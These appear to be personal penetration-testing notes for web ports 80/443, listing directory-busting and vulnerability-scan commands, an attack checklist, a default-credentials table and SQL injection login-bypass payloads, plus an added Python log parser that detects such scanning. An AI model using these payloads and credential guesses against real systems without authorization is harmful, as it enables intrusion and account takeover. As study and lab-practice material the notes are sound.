80/443 - HTTP(s)

First things I would do:

  1. Directory busting: dirb http://<IP>/

  2. Directory busting: gobuster dir -x php,txt,xml,asp,aspx --url http://<IP>/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 404 -f

  3. Directory busting: ffuf -c -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

  4. Vulnerability Scan: nmap <IP> -p80 --script vuln -Pn

  5. Vulnerability Scan: nikto -host http://<IP>/

  6. WordPress Scan: wpscan --url http://<IP>/
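From the defender's side, the enumeration above is loud in web-server access logs. The following Python sketch is an added example (not part of these notes) that parses constructed Apache combined-format lines and flags clients with a high 404 ratio or an assumed scanner token in the User-Agent:

```python
import re
from collections import defaultdict

# Constructed Apache "combined" log lines (not real traffic) resembling what a
# dirb/gobuster/ffuf run leaves behind: one client, mostly 404 responses.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /old HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /admin HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /backup HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /config.php HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /robots.txt HTTP/1.1" 200 48 "-" "gobuster/3.6"
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /test.aspx HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /wp-login.php HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.12 - - [10/Oct/2023:14:01:10 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.00 (Nikto/2.1.6)"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Assumed substrings to look for in the User-Agent; tools can override the UA,
# so the 404-ratio rule below is the primary signal.
SCANNER_TOKENS = ("gobuster", "dirb", "ffuf", "nikto", "wpscan")


def flag_enumeration(log_text, min_requests=6, max_404_ratio=0.6):
    """Return {ip: [reasons]} for clients that look like directory brute-forcers."""
    per_ip = defaultdict(lambda: {"total": 0, "404": 0, "uas": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:  # skip lines that are not in combined format
            continue
        s = per_ip[m["ip"]]
        s["total"] += 1
        s["404"] += m["status"] == "404"
        s["uas"].add(m["ua"].lower())
    flagged = {}
    for ip, s in per_ip.items():
        reasons = []
        if s["total"] >= min_requests and s["404"] / s["total"] >= max_404_ratio:
            reasons.append(f"{s['404']}/{s['total']} responses were 404")
        hits = [t for t in SCANNER_TOKENS if any(t in ua for ua in s["uas"])]
        if hits:
            reasons.append("scanner User-Agent token: " + ", ".join(hits))
        if reasons:
            flagged[ip] = reasons
    return flagged


if __name__ == "__main__":
    for ip, reasons in flag_enumeration(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

Tune min_requests and max_404_ratio to the site's normal 404 rate, since a single user following a dead link (10.0.0.5 above) must not trip the rule.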

While the scans are running, try:

  1. Try weak credentials and default logins; intercept the request in Burp and try a dictionary attack to crack the credentials; try SQLi

  2. Check the source code for anything juicy

  3. If you see any CMS (Joomla, WordPress, Tomcat, etc.), visit my go-to website here

  4. Sometimes you also find creds in the CMS's GitHub. Also look for config files and readme files, which can reveal sensitive info.

  5. If you find SQLi then go here

  6. If you find LFI/RFI then go here

  7. If you find File Uploads then go here

  8. Note all the usernames + keywords; sometimes the cewl tool helps for cracking the password

  9. Find exploits by searching keywords in the following manner: keyword poc, keyword GitHub, keyword htb, keyword hack the box

Default Creds Login Page

| User      | Pass      |
| --------- | --------- |
| admin     | admin     |
| admin     | password  |
| admin     | 1234      |
| admin     | 123456    |
| root      | toor      |
| test      | test      |
| guest     | guest     |
| anonymous | anonymous |

SQL Injection

| User                | Pass                |
| ------------------- | ------------------- |
| tom                 | tom                 |
| tom                 | ' or '1'='1         |
| tom                 | ' or 1='1           |
| tom                 | 1' or 1=1 -- -      |
| ' or '1'='1         | ' or '1'='1         |
| ' or ' 1=1          | ' or ' 1=1          |
| 1' or 1=1 -- -      | blah                |
| whatever' or '1'='1 | whatever' or '1'='1 |
